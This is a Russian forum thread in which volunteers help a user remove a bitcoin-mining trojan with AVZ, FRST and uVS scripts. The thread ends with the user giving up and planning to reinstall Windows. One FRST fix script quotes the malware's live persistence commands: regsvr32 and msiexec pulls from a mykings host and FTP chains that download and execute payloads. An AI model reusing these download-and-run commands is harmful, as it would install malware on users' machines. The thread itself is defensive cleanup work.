Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   Загружен ЦП. Открыв диспетчер задач,загрузка резко падает. (http://forum.oszone.net/showthread.php?t=330010)

zKGz 24-09-2017 15:19 2766505
Загружен ЦП. Открыв диспетчер задач,загрузка резко падает.
 
Здравствуйте, помогите пожалуйста решить проблему. В общем у меня всё то-же самое что в этой теме http://forum.oszone.net/thread-299306.html. Но я так понял решение индивидуальное.
Суть проблемы: допустим играю в игру, чувствую что процу плохо, открываю диспетчер, а там загрузка цп 100% и резко на спад идет.Файл 148340

akok 24-09-2017 18:14 2766552
Начнем с http://forum.oszone.net/thread-98169.html

zKGz 25-09-2017 09:50 2766697
Вложений: 1
прикрепил логи

Sandor 25-09-2017 10:22 2766708
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('c:\windows\help\lsmosee.exe', '');
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "ok" /F', 0, 15000, true);
 DeleteFile('c:\windows\debug\item.dat', '32');
 DeleteFile('c:\windows\debug\ok.dat', '32');
 DeleteFile('C:\Windows\help\lsmosee.exe', '32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
RebootWindows(true);
end.
Компьютер перезагрузится.



Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.



Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.

zKGz 25-09-2017 13:23 2766759
Вложений: 1
Файл 148347

Всё правильно?

Sandor 25-09-2017 13:30 2766761
Да. Продолжаем:
  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[Sx].txt.
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.

zKGz 25-09-2017 16:22 2766814
Вложений: 1
Файл 148359

Sandor 25-09-2017 16:25 2766815
1.
  • Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
  • Нажмите кнопку "Scan" ("Сканировать").
  • По окончании сканирования в меню Инструменты - Настройки отметьте дополнительно в разделе Сбросить:
    • Политики IE
    • Политики Chrome
      и нажмите Ok.
  • Нажмите кнопку "Clean" ("Очистить") и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[Cx].txt.
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

Подробнее читайте в этом руководстве.

2.
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

zKGz 25-09-2017 17:46 2766832
Вложений: 4
Вот

akok 27-09-2017 00:19 2767153
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    () C:\Windows\debug\lsmose.exe
    VirusTotal: C:\Windows\debug\lsmose.exe;C:\Program Files (x86)\Common Files\BattlEye\BEService.exe;C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
    C:\Windows\debug\lsmose.exe
    HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION
    HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    2017-09-25 20:16 - 2017-09-25 20:16 - 000003502 _____ C:\Windows\System32\Tasks\Mysa3
    2017-09-25 20:16 - 2017-09-25 20:16 - 000003422 _____ C:\Windows\System32\Tasks\Mysa2
    2017-09-25 20:16 - 2017-09-25 20:16 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
    2017-09-25 20:16 - 2017-09-25 20:16 - 000003186 _____ C:\Windows\System32\Tasks\ok
    Task: {79FD536D-5011-4AD0-A49E-EA9FE5DE1BEE} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
    Task: {358986D7-9BE6-4252-B909-6404E04B9D19} - System32\Tasks\Mysa3 => cmd /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
    Task: {E86CF195-AB93-42DF-A266-D065BC7E94D4} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
    Task: {F837B228-089C-49C0-A076-8AB92DCAA347} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
    2017-08-08 21:53 - 2017-09-22 09:44 - 003023872 _____ () c:\windows\debug\lsmose.exe
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

И такую проверку сделайте https://safezone.cc/resources/prover...ilitoj-sfc.55/

zKGz 27-09-2017 16:23 2767279
Скопировать а вставлять никуда не надо?

Sandor 27-09-2017 16:24 2767280
Нет, скрипт выполнится из буфера обмена.

zKGz 27-09-2017 16:39 2767286
Вложений: 1
Файл 148397у меня все логины слетели на сайтах это нормально?Файл 148398

akok 27-09-2017 22:15 2767330
Цитата:
Цитата zKGz
меня все логины слетели на сайтах это нормально »
Да, EmptyTemp: чистит временные хранилища браузеров, соответственно cookie тоже очищены.

Что с проблемой?

zKGz 28-09-2017 17:28 2767469
Пока-что не понял. Нужно потестировать. Но допустим если просто диспетчер открыть, то показывает 13 заргузку цп и сразу падает до 0.

akok 29-09-2017 00:01 2767486
Дабы открыть диспетчер задач тоже нужны ресурсы процессора. Понаблюдайте.

zKGz 30-09-2017 16:01 2767751
ну вот щас было, 100% загрузка. свернул игру(она кстати вообще не требовательная) , полуается открываю диспетчер, показывает 100% и сразу падает до 40%

akok 30-09-2017 17:31 2767759
  1. Скачайте Universal Virus Sniffer (uVS)
  2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
    !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.
  4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.
    !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".
Подробнее читайте в руководстве Как подготовить лог UVS.

Проверьте какой процесс грузит систему
https://docs.microsoft.com/en-us/sys...ocess-explorer

zKGz 05-10-2017 17:07 2768632
Вложений: 1
Файл 148536

Sandor 05-10-2017 21:20 2768670
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.0.10 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    BREG
    ;---------command-block---------
    zoo %SystemRoot%\DEBUG\ITEM.DAT
    delall %SystemRoot%\DEBUG\ITEM.DAT
    delref PS&AMP;C:\WINDOWS\HELP\LSMOSEE.EXE
    zoo %SystemRoot%\DEBUG\OK.DAT
    delall %SystemRoot%\DEBUG\OK.DAT
    delref S.DAT
    delref S.RAR
    apply

    czoo
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)
    Если архив отсутствует, то заархивруйте папку ZOO с паролем virus.
  7. Полученный архив отправьте на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
  8. Подробнее читайте в этом руководстве.


Повторите лог uVS

regist 06-10-2017 17:31 2768769
zKGz, + затем

Скачайте эту утилиту. Распакуйте и запустите.
Не дожидаясь окончания сканирования, соберите новый лог uVS.

Для создания нового лога uVS
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.0.5 [http://dsrt.dyndns.org]
    v400c
    adddir %SystemRoot%
    crimg
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы.
  6. После этого в папке с программой будет создан образ автозапуска название, которого имеет формат "имя_компьютера_дата_сканирования". Прикрепите этот образ к следующему сообщению
  7. !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".
Подробнее читайте в руководстве Как подготовить лог UVS

zKGz 08-10-2017 19:49 2769221
Вложений: 1
Файл 148589

вроде всё сделал. AutorunVTC до сих пор сканирует

zKGz 08-10-2017 20:00 2769223
Был вопрос о проблеме, она не исчезла, смотрел ютуб, чувствую что комп томозит, открываю диспетчер а там зарузка цп98% и резко на спад до цп20% где-то.

И такой вопрос, вот мы что-то делаем, что-то шаманим, а что изменилось? Просто в обычных прогах там написано, что найдено столько-то виурсов и тд. А тут ничего не понятно

regist 08-10-2017 20:27 2769231
Цитата:
Цитата zKGz
Был вопрос о проблеме, она не исчезла »
разумеется не исчезла, у вас до сих пор вирусы сидят и здравствуют.
Цитата:
Цитата zKGz
2017-10-08_23-46-49_log.txt »
Вы не тот файл прикрепили. Внимательно перечитайте какой надо и прикрепите.

+ IPSec политики сами настраивали?

zKGz 09-10-2017 15:14 2769385
"+ IPSec политики сами настраивали? " я даже не знаю что это..
файл сильно большой

regist 09-10-2017 15:16 2769387
закачайте архив на любой файлообменник, не требующий ввода капчи (например: Zippyshare, My-Files.RU, File.Karelia), либо на яндекс диск.

zKGz 09-10-2017 16:26 2769401
https://yadi.sk/d/LpEqSvDr3NbhgW

regist 09-10-2017 17:38 2769412
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.0.10 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    BREG
    zoo %SystemRoot%\SYSWOW64\LSM.EXE
    delall %SystemRoot%\SYSWOW64\LSM.EXE
    delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
    zoo %SystemRoot%\DEBUG\OK.DAT
    delall %SystemRoot%\DEBUG\OK.DAT
    delref PS&AMP;C:\WINDOWS\HELP\LSMOSEE.EXE
    zoo %SystemRoot%\DEBUG\LSMOSE.EXE
    bl 365DDFA7E8165EC4B979875D1E4D194B 2699264
    addsgn 9ACD0DDA788244FFF62BF446CCA037E359967D3008F883EDB476EB4BC9134A779291F6368A65ED50B9DA6FFA823004EAF6EE8A55B8ACEA3C6AA0D1B0EAE005F0 8 LSMOSE.EXE (BitCoinMiner.TY) 7

    zoo %SystemRoot%\HELP\LSMOSEE.EXE
    bl A5652657138B0A8340165FCF06FE0BED 1908224
    addsgn 19E439DE4C6A4C720BD447A98337ED8E69AFFC7D88735B5D851119A6B45D77B9AEA1C7573E55AE8AC2DD809F4656B113ACCF018D5A6DB64AA8A32999C5062273 8 Application.BitCoinMiner.TY 7
    zoo %SystemRoot%\DEBUG\ITEM.DAT
    delall %SystemRoot%\DEBUG\ITEM.DAT
    delref S.DAT
    delref S.RAR
    chklst
    delvir
    regt 25
    czoo
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)
    Если архив отсутствует, то заархивруйте папку ZOO с паролем virus.
  7. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
  8. Подробнее читайте в этом руководстве.

сделайте свежий образ автозапуска.

zKGz 16-10-2017 17:51 2770981
Всмысле
Цитата:
Цитата regist
сделайте свежий образ автозапуска. »
?

zKGz 16-10-2017 18:37 2770991
Только что вылез смотрел ютуб, затрещал звук и выключился пк. Буквально спустя пол часа выполнения скрипта.
И выдало окно ошибки.
Сигнатура проблемы:
Имя события проблемы: BlueScreen
Версия ОС: 6.1.7601.2.1.0.256.48
Код языка: 1049

Дополнительные сведения об этой проблеме:
BCCode: 50
BCP1: FFFFFA7F894180ED
BCP2: 0000000000000001
BCP3: FFFFFA8009418003
BCP4: 0000000000000007
OS Version: 6_1_7601
Service Pack: 1_0
Product: 256_1

Файлы, содержащие сведения об этой проблеме:
C:\Windows\Minidump\101617-15990-01.dmp
C:\Users\Администратор\AppData\Local\Temp\WER-25178-0.sysdata.xml

Sandor 16-10-2017 19:35 2771001
Цитата:
Цитата zKGz
Файлы, содержащие сведения об этой проблеме:
C:\Windows\Minidump\101617-15990-01.dmp »
Этот файл упакуйте и прикрепите к следующему сообщению.

Цитата:
Цитата zKGz
Всмысле »
Повторите лог uVS (сообщение №21)

zKGz 21-10-2017 06:16 2772124
Вложений: 1
Файл 148847

лог https://yadi.sk/d/sVHHxrEG3NweDo

zKGz 21-10-2017 15:05 2772185
это хотябы вирус жрет цп?

Sandor 21-10-2017 16:24 2772201
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.0.10 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    BREG
    ;---------command-block---------
    zoo %SystemRoot%\DEBUG\ITEM.DAT
    delall %SystemRoot%\DEBUG\ITEM.DAT
    delref PS&AMP;C:\WINDOWS\HELP\LSMOSEE.EXE
    zoo %SystemRoot%\DEBUG\OK.DAT
    delall %SystemRoot%\DEBUG\OK.DAT
    delref S&AMP;A.EXE
    delref S.DAT
    delref S.RAR
    delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
    apply

    zoo %SystemRoot%\DEBUG\LSMOSE.EXE
    bl 468BC36D88341082CEF7553C4778009A 1838080
    addsgn 1B9062895583275A0BD45874503D2AD61EC7001F4ACB1F787A13A3BDABB07EFFD85F40931E334EAA2B5FCC1685EEC9C55E36ABD85ADAF0442DA825A158691A63 8 Trojan.BtcMine.1559 [DrWeb] 7

    zoo %SystemRoot%\HELP\LSMOSEE.EXE
    bl B819E4D414DF495DBCCAA4E4E9ED534E 1102288
    addsgn 1AD27E61AAAD085623C242D564549B4101A2941C8C5F6229195F3AC874EEB37023876C9140AEEAC7E46EDDDBA4CA01D5F36F9E715336167B6F4F5124DBD8F3DA 8 Multi.Generic [Kaspersky] 7

    chklst
    delvir

    czoo
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)
    Если архив отсутствует, то заархивруйте папку ZOO с паролем virus.
  7. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
  8. Подробнее читайте в этом руководстве.


Соберите и прикрепите новый лог uVS.

zKGz 27-10-2017 18:34 2773806
В общем это ласт трай.

https://yadi.sk/d/46C5Ozd33PA46J

Sandor 29-10-2017 15:38 2774136
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.0.10 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    BREG
    zoo %SystemRoot%\DEBUG\LSMOSE.EXE
    bl F615B2BA3CDAFA2882CEF3F2071161AA 3113472
    addsgn 19E490F17E6A4C720BD447962FCE120DC7955394C0D04057D879BF1D80B4F50EB4C765FD364DB2DD960ED830366B936C2D7393E3417534BA72268B2724CD735C 8 Trojan.BtcMine.1559 [DrWeb] 7

    zoo %SystemRoot%\HELP\LSMOSEE.EXE
    bl 4FD6F3A7CE09AF42991A93CDA9E1CCD0 1448727
    addsgn 6E05903EA395F305A791082835F72C19E161B322A5B3777924DFA5AC7E5D2E2CB780CF3E8E9CDD0A09A55D876D72550AA3E17542DA10DAF5CCB3665589B341E9 8 Multi.Generic [Kaspersky] 7

    chklst
    delvir

    czoo
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2017-06-30_22-04-27.7z)
    Если архив отсутствует, то заархивруйте папку ZOO с паролем virus.
  7. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
  8. Подробнее читайте в этом руководстве.


Еще раз подготовьте лог uVS.

zKGz 31-10-2017 08:10 2774482
нет , ......., это какой-то день сурка, каждый раз скрипт и лог... а толку ноль, мне проще винду переустановить.


Время: 05:43.

Время: 05:43.
© OSzone.net 2001-